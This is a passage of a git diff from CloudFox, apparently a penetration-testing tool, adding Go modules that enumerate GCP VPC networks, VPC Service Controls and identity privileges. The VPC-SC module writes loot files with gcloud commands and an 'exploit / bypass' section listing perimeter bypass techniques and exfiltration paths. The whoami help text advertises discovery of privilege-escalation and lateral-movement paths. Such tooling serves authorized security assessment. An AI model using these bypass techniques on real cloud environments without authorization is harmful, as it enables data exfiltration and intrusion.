m.ProjectPeerings[projectID]; ok && len(peerings) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-peerings", + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(peerings), + }) + } + + if routes, ok := m.ProjectRoutes[projectID]; ok && len(routes) > 0 { + routeBody := m.routesToTableBody(routes) + if len(routeBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "custom-routes", + Header: m.getRoutesHeader(), + Body: routeBody, + }) + } + } + + return tableFiles +} + +func (m *VPCNetworksModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectNetworks { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSubnets { + projectIDs[projectID] = true + } + for projectID := range m.ProjectPeerings { + projectIDs[projectID] = true + } + for projectID := range m.ProjectRoutes { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = VPCNetworksOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_VPCNETWORKS_MODULE_NAME) + } +} + 
+func (m *VPCNetworksModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allRoutes := m.getAllRoutes() + + var tables []internal.TableFile + + if len(allNetworks) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-networks", + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(allNetworks), + }) + } + + if len(allSubnets) > 0 { + tables = append(tables, internal.TableFile{ + Name: "subnets", + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(allSubnets), + }) + } + + if len(allPeerings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-peerings", + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(allPeerings), + }) + } + + routeBody := m.routesToTableBody(allRoutes) + if len(routeBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "custom-routes", + Header: m.getRoutesHeader(), + Body: routeBody, + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := VPCNetworksOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_VPCNETWORKS_MODULE_NAME) + } +} diff --git a/gcp/commands/vpcsc.go b/gcp/commands/vpcsc.go new file mode 100644 index 00000000..92ff8ef0 --- /dev/null +++ b/gcp/commands/vpcsc.go @@ -0,0 +1,453 @@ +package commands + +import ( + 
"context" + "fmt" + "strings" + "sync" + + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + vpcscservice "github.com/BishopFox/cloudfox/gcp/services/vpcscService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var orgID string + +var GCPVPCSCCommand = &cobra.Command{ + Use: globals.GCP_VPCSC_MODULE_NAME, + Aliases: []string{"vpcsc", "service-controls", "sc"}, + Short: "Enumerate VPC Service Controls", + Long: `Enumerate VPC Service Controls configuration. + +Features: +- Lists access policies for the organization +- Enumerates service perimeters (regular and bridge) +- Shows access levels and their conditions +- Identifies overly permissive configurations +- Analyzes ingress/egress policies + +Note: Organization ID is auto-discovered from project ancestry. Use --org flag to override.`, + Run: runGCPVPCSCCommand, +} + +func init() { + GCPVPCSCCommand.Flags().StringVar(&orgID, "org", "", "Organization ID (auto-discovered if not provided)") +} + +type VPCSCModule struct { + gcpinternal.BaseGCPModule + OrgID string + Policies []vpcscservice.AccessPolicyInfo + Perimeters []vpcscservice.ServicePerimeterInfo + AccessLevels []vpcscservice.AccessLevelInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type VPCSCOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o VPCSCOutput) TableFiles() []internal.TableFile { return o.Table } +func (o VPCSCOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPVPCSCCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_VPCSC_MODULE_NAME) + if err != nil { + return + } + + // Auto-discover org ID if not provided + effectiveOrgID := orgID + if effectiveOrgID == "" { + cmdCtx.Logger.InfoM("Auto-discovering organization ID...", globals.GCP_VPCSC_MODULE_NAME) + 
orgsSvc := orgsservice.New() + + // Method 1: Try to get org ID from project ancestry + if len(cmdCtx.ProjectIDs) > 0 { + discoveredOrgID, err := orgsSvc.GetOrganizationIDFromProject(cmdCtx.ProjectIDs[0]) + if err == nil { + effectiveOrgID = discoveredOrgID + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID from project ancestry: %s", effectiveOrgID), globals.GCP_VPCSC_MODULE_NAME) + } + } + + // Method 2: Fallback to searching for accessible organizations + if effectiveOrgID == "" { + orgs, err := orgsSvc.SearchOrganizations() + if err == nil && len(orgs) > 0 { + // Extract org ID from name (format: "organizations/ORGID") + effectiveOrgID = strings.TrimPrefix(orgs[0].Name, "organizations/") + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID from search: %s (%s)", effectiveOrgID, orgs[0].DisplayName), globals.GCP_VPCSC_MODULE_NAME) + } + } + + // If still no org ID found, error out + if effectiveOrgID == "" { + cmdCtx.Logger.ErrorM("Could not auto-discover organization ID. 
Use --org flag to specify.", globals.GCP_VPCSC_MODULE_NAME) + return + } + } + + module := &VPCSCModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgID: effectiveOrgID, + Policies: []vpcscservice.AccessPolicyInfo{}, + Perimeters: []vpcscservice.ServicePerimeterInfo{}, + AccessLevels: []vpcscservice.AccessLevelInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *VPCSCModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Enumerating VPC Service Controls for organization: %s", m.OrgID), globals.GCP_VPCSC_MODULE_NAME) + + svc := vpcscservice.New() + + // List access policies + policies, err := svc.ListAccessPolicies(m.OrgID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list access policies for organization %s", m.OrgID)) + return + } + m.Policies = policies + + if len(m.Policies) == 0 { + logger.InfoM("No access policies found", globals.GCP_VPCSC_MODULE_NAME) + return + } + + // For each policy, list perimeters and access levels + for _, policy := range m.Policies { + perimeters, err := svc.ListServicePerimeters(policy.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list perimeters for policy %s", policy.Name)) + } else { + m.Perimeters = append(m.Perimeters, perimeters...) + } + + levels, err := svc.ListAccessLevels(policy.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list access levels for policy %s", policy.Name)) + } else { + m.AccessLevels = append(m.AccessLevels, levels...) 
+ } + } + + m.addAllToLoot() + + logger.SuccessM(fmt.Sprintf("Found %d access policy(ies), %d perimeter(s), %d access level(s)", + len(m.Policies), len(m.Perimeters), len(m.AccessLevels)), globals.GCP_VPCSC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *VPCSCModule) initializeLootFiles() { + m.LootMap["vpcsc-commands"] = &internal.LootFile{ + Name: "vpcsc-commands", + Contents: "# VPC Service Controls Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *VPCSCModule) addAllToLoot() { + // Add policies to loot + for _, policy := range m.Policies { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# POLICY: %s\n"+ + "# =============================================================================\n"+ + "# Title: %s\n"+ + "# Parent: %s\n"+ + "\n# Describe access policy:\n"+ + "gcloud access-context-manager policies describe %s\n\n"+ + "# List perimeters:\n"+ + "gcloud access-context-manager perimeters list --policy=%s\n\n"+ + "# List access levels:\n"+ + "gcloud access-context-manager levels list --policy=%s\n\n", + policy.Name, policy.Title, policy.Parent, + policy.Name, policy.Name, policy.Name, + ) + } + + // Add perimeters to loot + for _, perimeter := range m.Perimeters { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# PERIMETER: %s (Policy: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Title: %s\n"+ + "# Type: %s\n"+ + "# Resources: %d\n"+ + "# Restricted Services: %d\n"+ + "# Ingress Policies: %d\n"+ + "# Egress Policies: %d\n"+ + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe perimeter:\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s\n\n"+ + "# List protected resources:\n"+ + "gcloud access-context-manager perimeters describe 
%s --policy=%s --format=\"value(status.resources)\"\n\n"+ + "# List restricted services:\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.restrictedServices'\n\n"+ + "# List ingress policies (who can access from outside):\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.ingressPolicies'\n\n"+ + "# List egress policies (what can leave the perimeter):\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.egressPolicies'\n\n", + perimeter.Name, perimeter.PolicyName, + perimeter.Title, perimeter.PerimeterType, + len(perimeter.Resources), len(perimeter.RestrictedServices), + perimeter.IngressPolicyCount, perimeter.EgressPolicyCount, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + ) + + // Exploit/bypass commands + m.LootMap["vpcsc-commands"].Contents += "# === EXPLOIT / BYPASS COMMANDS ===\n\n" + + if perimeter.IngressPolicyCount > 0 { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# Ingress policies exist - check for overly permissive access:\n"+ + "# Review which identities/access levels are allowed ingress\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.ingressPolicies[] | {from: .ingressFrom, to: .ingressTo}'\n\n", + perimeter.Name, perimeter.PolicyName, + ) + } + + if perimeter.EgressPolicyCount > 0 { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# Egress policies exist - check for data exfil paths:\n"+ + "# Review what services/resources can send data outside the perimeter\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.status.egressPolicies[] | {from: .egressFrom, to: .egressTo}'\n\n", + perimeter.Name, perimeter.PolicyName, + ) + } + + if 
perimeter.PerimeterType == "PERIMETER_TYPE_BRIDGE" { + m.LootMap["vpcsc-commands"].Contents += "# [FINDING] This is a BRIDGE perimeter - it connects two perimeters\n" + + "# Bridge perimeters can be used to exfiltrate data between perimeters\n" + + "# Check which perimeters are bridged and what services flow between them\n\n" + } + + // Common bypass techniques + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# VPC-SC Bypass Techniques:\n"+ + "# 1. If you have access to a project INSIDE the perimeter, use it as a pivot\n"+ + "# 2. Check if any access levels use overly permissive IP ranges\n"+ + "# 3. Look for services NOT in the restricted list (data can flow through unrestricted services)\n"+ + "# 4. Check for ingress policies that allow specific identities you control\n"+ + "# 5. Use Cloud Shell (if accessible) - it may bypass VPC-SC\n\n"+ + "# Test if you're inside the perimeter:\n"+ + "gcloud storage ls gs://BUCKET_IN_PERIMETER 2>&1 | grep -i 'Request is prohibited by organization'\n\n"+ + "# Check dry-run mode (violations logged but not blocked):\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=json | jq '.useExplicitDryRunSpec'\n\n", + perimeter.Name, perimeter.PolicyName, + ) + } + + // Add access levels to loot + for _, level := range m.AccessLevels { + ipSubnets := "-" + if len(level.IPSubnetworks) > 0 { + ipSubnets = strings.Join(level.IPSubnetworks, ", ") + } + regions := "-" + if len(level.Regions) > 0 { + regions = strings.Join(level.Regions, ", ") + } + + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# ACCESS LEVEL: %s (Policy: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Title: %s\n"+ + "# IP Subnets: %s\n"+ + "# Regions: %s\n"+ + "# Members: %d\n"+ + "\n# Describe access level:\n"+ + "gcloud access-context-manager levels describe %s --policy=%s\n\n", + 
level.Name, level.PolicyName, + level.Title, ipSubnets, regions, len(level.Members), + level.Name, level.PolicyName, + ) + } +} + +func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *VPCSCModule) buildTables() []internal.TableFile { + var tables []internal.TableFile + + // Access Policies table + if len(m.Policies) > 0 { + policyHeader := []string{"Policy", "Title", "Parent", "Created", "Updated"} + var policyBody [][]string + for _, policy := range m.Policies { + policyBody = append(policyBody, []string{ + policy.Name, + policy.Title, + policy.Parent, + policy.CreateTime, + policy.UpdateTime, + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-policies", + Header: policyHeader, + Body: policyBody, + }) + } + + // Service Perimeters table + if len(m.Perimeters) > 0 { + perimeterHeader := []string{ + "Policy", "Name", "Title", "Type", "Resources", "Restricted Services", + "Ingress Policies", "Egress Policies", + } + var perimeterBody [][]string + for _, perimeter := range m.Perimeters { + perimeterBody = append(perimeterBody, []string{ + perimeter.PolicyName, + perimeter.Name, + perimeter.Title, + perimeter.PerimeterType, + fmt.Sprintf("%d", len(perimeter.Resources)), + fmt.Sprintf("%d", len(perimeter.RestrictedServices)), + fmt.Sprintf("%d", perimeter.IngressPolicyCount), + fmt.Sprintf("%d", perimeter.EgressPolicyCount), + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-perimeters", + Header: perimeterHeader, + Body: perimeterBody, + }) + } + + // Access Levels table - one row per member + if len(m.AccessLevels) > 0 { + levelHeader := []string{"Policy", "Name", "Title", "IP Subnets", "Regions", "Member"} + var levelBody [][]string + for _, level := range m.AccessLevels { + ipSubnets := "-" + if len(level.IPSubnetworks) > 0 { + ipSubnets = 
strings.Join(level.IPSubnetworks, ", ") + } + regions := "-" + if len(level.Regions) > 0 { + regions = strings.Join(level.Regions, ", ") + } + + if len(level.Members) > 0 { + // One row per member + for _, member := range level.Members { + levelBody = append(levelBody, []string{ + level.PolicyName, + level.Name, + level.Title, + ipSubnets, + regions, + member, + }) + } + } else { + // Access level with no members + levelBody = append(levelBody, []string{ + level.PolicyName, + level.Name, + level.Title, + ipSubnets, + regions, + "-", + }) + } + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-access-levels", + Header: levelHeader, + Body: levelBody, + }) + } + + return tables +} + +func (m *VPCSCModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *VPCSCModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := VPCSCOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output location - prefer org-level, fall back to project-level + orgID := "" + if m.OrgID != "" { + orgID = m.OrgID + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // Place at org level + outputData.OrgLevelData[orgID] = output + } else if len(m.ProjectIDs) > 0 { + // Fall back to first project level if no org discovered + outputData.ProjectLevelData[m.ProjectIDs[0]] = output + } + + pathBuilder := m.BuildPathBuilder() + + err := 
internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_VPCSC_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *VPCSCModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := VPCSCOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "org", []string{m.OrgID}, []string{m.OrgID}, m.Account, output) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + "Could not write output") + } +} diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index c686b7ba..8e101cde 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -1,34 +1,2064 @@ package commands import ( + "context" "fmt" + "strings" + "sync" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" OAuthService "github.com/BishopFox/cloudfox/gcp/services/oauthService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" + + cloudidentity "google.golang.org/api/cloudidentity/v1" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + crmv3 "google.golang.org/api/cloudresourcemanager/v3" ) +// Flags for whoami command +var whoamiExtended bool +var whoamiGroups []string +var whoamiGroupsFile string + var GCPWhoAmICommand = &cobra.Command{ - Use: globals.GCP_WHOAMI_MODULE_NAME, - Short: "Display the email address of the GCP authenticated user", - Args: cobra.NoArgs, - Run: runGCPWhoAmICommand, + Use: globals.GCP_WHOAMI_MODULE_NAME, + 
Aliases: []string{"identity", "me"}, + Short: "Display identity context for the authenticated GCP user/service account", + Long: `Display identity context for the authenticated GCP user/service account. + +Default output: +- Current identity details (email, type) +- Organization and folder context +- Effective role bindings across projects (with inheritance source) + +With --extended flag (adds): +- Service accounts that can be impersonated +- Privilege escalation opportunities +- Data exfiltration capabilities (compute exports, logging sinks, database exports, etc.) +- Lateral movement capabilities (VPC peering, OS Login, firewall modifications, etc.) +- Exploitation commands + +With --groups flag: +- Provide known group email addresses when group enumeration is permission denied +- Role bindings from these groups will be included in the output +- Use comma-separated list: --groups=group1@domain.com,group2@domain.com + +With --groupslist flag: +- Import groups from a file (one group per line) +- Same behavior as --groups but reads from file +- Example: --groupslist=groups.txt`, + Run: runGCPWhoAmICommand, +} + +func init() { + GCPWhoAmICommand.Flags().BoolVarP(&whoamiExtended, "extended", "e", false, "Enable extended enumeration (impersonation targets, privilege escalation paths)") + GCPWhoAmICommand.Flags().StringSliceVarP(&whoamiGroups, "groups", "g", []string{}, "Comma-separated list of known group email addresses (used when group enumeration is permission denied)") + GCPWhoAmICommand.Flags().StringVar(&whoamiGroupsFile, "groupslist", "", "Path to file containing group email addresses (one per line)") +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type IdentityContext struct { + Email string + Type string // "user" or "serviceAccount" + UniqueID string + ProjectIDs []string // Keep for backward compatibility + Projects []ProjectInfo // New: stores project ID and display name + Organizations []OrgInfo + Folders 
[]FolderInfo + Groups []GroupMembership // Groups the identity is a member of + GroupsEnumerated bool // Whether group enumeration was successful + GroupsProvided []string // Groups provided via --groups flag + GroupsMismatch bool // True if provided groups differ from enumerated +} + +type ProjectInfo struct { + ProjectID string + DisplayName string +} + +type OrgInfo struct { + Name string + DisplayName string + OrgID string +} + +type FolderInfo struct { + Name string + DisplayName string + Parent string +} + +type GroupMembership struct { + GroupID string // e.g., "groups/abc123" + Email string // e.g., "security-team@example.com" + DisplayName string // e.g., "Security Team" + Source string // "enumerated" or "provided" +} + +type RoleBinding struct { + Role string + Scope string // "organization", "folder", "project" + ScopeID string + ScopeName string // Display name of the scope resource + Inherited bool + Condition string + InheritedFrom string // Source of binding: "direct", group email, or parent resource + MemberType string // "user", "serviceAccount", "group" +} + +type ImpersonationTarget struct { + ServiceAccount string + ProjectID string + CanImpersonate bool + CanCreateKeys bool + CanActAs bool +} + +type PrivilegeEscalationPath struct { + ProjectID string // GCP project ID + Permission string // The permission/method enabling privesc + Category string // Category of the privesc (SA Impersonation, Key Creation, etc.) 
+ Description string + SourceRole string // The role that grants this potential path + SourceScope string // Where the role is granted (project ID, folder, org) + Command string // Exploit command (for loot file only) + Confidence string // "confirmed" (verified via API) or "potential" (inferred from role) + RequiredPerms string // Specific permissions needed for this path } +// DataExfilCapability represents a data exfiltration capability for the current identity +type DataExfilCapability struct { + ProjectID string + Permission string + Category string + Description string + SourceRole string // The role/principal that grants this capability + SourceScope string // Where the role is granted (project, folder, org) +} + +// LateralMoveCapability represents a lateral movement capability for the current identity +type LateralMoveCapability struct { + ProjectID string + Permission string + Category string + Description string + SourceRole string // The role/principal that grants this capability + SourceScope string // Where the role is granted (project, folder, org) +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type WhoAmIModule struct { + gcpinternal.BaseGCPModule + + Identity IdentityContext + RoleBindings []RoleBinding + ImpersonationTargets []ImpersonationTarget + PrivEscPaths []PrivilegeEscalationPath + DataExfilCapabilities []DataExfilCapability + LateralMoveCapabilities []LateralMoveCapability + DangerousPermissions []string + LootMap map[string]*internal.LootFile + Extended bool + ProvidedGroups []string // Groups provided via --groups flag + mu sync.Mutex + + // FoxMapper findings - store the full findings for detailed path visualization + FoxMapperPrivescFindings []foxmapperservice.PrivescFinding + FoxMapperLateralFindings []foxmapperservice.LateralFinding + FoxMapperDataExfilFindings []foxmapperservice.DataExfilFinding + FoxMapperService *foxmapperservice.FoxMapperService +} + +// 
------------------------------ +// Output Struct +// ------------------------------ +type WhoAmIOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o WhoAmIOutput) TableFiles() []internal.TableFile { return o.Table } +func (o WhoAmIOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ func runGCPWhoAmICommand(cmd *cobra.Command, args []string) { - logger := internal.NewLogger() + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_WHOAMI_MODULE_NAME) + if err != nil { + return + } - // Initialize the OAuthService - oauthService := OAuthService.NewOAuthService() + // Combine groups from --groups flag and --groupslist file + allGroups := whoamiGroups + if whoamiGroupsFile != "" { + fileGroups := internal.LoadFileLinesIntoArray(whoamiGroupsFile) + allGroups = append(allGroups, fileGroups...) + } - // Call the WhoAmI function + // Create module instance + module := &WhoAmIModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + RoleBindings: []RoleBinding{}, + ImpersonationTargets: []ImpersonationTarget{}, + PrivEscPaths: []PrivilegeEscalationPath{}, + DangerousPermissions: []string{}, + LootMap: make(map[string]*internal.LootFile), + Extended: whoamiExtended, + ProvidedGroups: allGroups, + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *WhoAmIModule) Execute(ctx context.Context, logger internal.Logger) { + if m.Extended { + logger.InfoM("Gathering comprehensive identity context (extended mode)...", globals.GCP_WHOAMI_MODULE_NAME) + } else { + logger.InfoM("Gathering identity context...", globals.GCP_WHOAMI_MODULE_NAME) + } + + // Step 1: Get current identity + oauthService := 
OAuthService.NewOAuthService() principal, err := oauthService.WhoAmI() if err != nil { - logger.ErrorM(fmt.Sprintf("Error retrieving token info: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "oauth2.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not retrieve token info") + return + } + + m.Identity = IdentityContext{ + Email: principal.Email, + ProjectIDs: m.ProjectIDs, + } + + // Determine identity type + if strings.HasSuffix(principal.Email, ".gserviceaccount.com") { + m.Identity.Type = "serviceAccount" + } else { + m.Identity.Type = "user" + } + + logger.InfoM(fmt.Sprintf("Authenticated as: %s (%s)", m.Identity.Email, m.Identity.Type), globals.GCP_WHOAMI_MODULE_NAME) + + // Step 2: Get organization context (always run) + m.getOrganizationContext(ctx, logger) + + // Step 3: Get group memberships for the current identity + m.getGroupMemberships(ctx, logger) + + // Step 4: Get role bindings across projects (always run) + m.getRoleBindings(ctx, logger) + + // Extended mode: Additional enumeration + if m.Extended { + // Step 4: Find impersonation targets + m.findImpersonationTargets(ctx, logger) + + // Step 5: Identify privilege escalation paths + m.identifyPrivEscPaths(ctx, logger) + + // Step 6: Identify data exfiltration capabilities + m.identifyDataExfilCapabilities(ctx, logger) + + // Step 7: Identify lateral movement capabilities + m.identifyLateralMoveCapabilities(ctx, logger) + } + + // Step 8: Generate loot + m.generateLoot() + + // Write output + m.writeOutput(ctx, logger) +} + +// getOrganizationContext retrieves organization and folder hierarchy +func (m *WhoAmIModule) getOrganizationContext(ctx context.Context, logger internal.Logger) { + // Create resource manager clients + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + 
"Could not create Cloud Resource Manager client") + return + } + + // Create v3 client for fetching folder details + crmv3Service, err := crmv3.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Resource Manager v3 client") + // Continue without v3, we just won't get display names for folders + } + + // Get project ancestry for each project + for _, projectID := range m.ProjectIDs { + // Fetch project details to get display name + projectInfo := ProjectInfo{ + ProjectID: projectID, + } + project, err := crmService.Projects.Get(projectID).Do() + if err == nil && project != nil { + projectInfo.DisplayName = project.Name + } + m.Identity.Projects = append(m.Identity.Projects, projectInfo) + + // Get ancestry + resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + fmt.Sprintf("Could not get ancestry for project %s", projectID)) + continue + } + + for _, ancestor := range resp.Ancestor { + switch ancestor.ResourceId.Type { + case "organization": + orgInfo := OrgInfo{ + OrgID: ancestor.ResourceId.Id, + Name: fmt.Sprintf("organizations/%s", ancestor.ResourceId.Id), + } + // Try to get display name for organization + org, err := crmService.Organizations.Get(orgInfo.Name).Do() + if err == nil && org != nil { + orgInfo.DisplayName = org.DisplayName + } + // Check if already added + exists := false + for _, o := range m.Identity.Organizations { + if o.OrgID == orgInfo.OrgID { + exists = true + break + } + } + if !exists { + m.Identity.Organizations = append(m.Identity.Organizations, orgInfo) + } + case "folder": + folderName := fmt.Sprintf("folders/%s", ancestor.ResourceId.Id) + folderInfo := FolderInfo{ + Name: folderName, + } + // Try to get display name for folder using v3 API + if crmv3Service 
!= nil { + folder, err := crmv3Service.Folders.Get(folderName).Do() + if err == nil && folder != nil { + folderInfo.DisplayName = folder.DisplayName + folderInfo.Parent = folder.Parent + } + } + // Check if already added + exists := false + for _, f := range m.Identity.Folders { + if f.Name == folderInfo.Name { + exists = true + break + } + } + if !exists { + m.Identity.Folders = append(m.Identity.Folders, folderInfo) + } + } + } + } + + if len(m.Identity.Organizations) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization(s), %d folder(s)", len(m.Identity.Organizations), len(m.Identity.Folders)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// normalizeGroupEmail ensures group has full email format +// If group doesn't contain @, tries to infer domain from identity email +func (m *WhoAmIModule) normalizeGroupEmail(group string) string { + if strings.Contains(group, "@") { + return group + } + + // Try to infer domain from identity email + if m.Identity.Email != "" && strings.Contains(m.Identity.Email, "@") { + parts := strings.SplitN(m.Identity.Email, "@", 2) + if len(parts) == 2 { + return group + "@" + parts[1] + } + } + + // Return as-is if we can't infer domain + return group +} + +// getGroupMemberships retrieves the groups that the current identity is a member of +func (m *WhoAmIModule) getGroupMemberships(ctx context.Context, logger internal.Logger) { + // Normalize provided groups to full email format + var normalizedGroups []string + for _, group := range m.ProvidedGroups { + 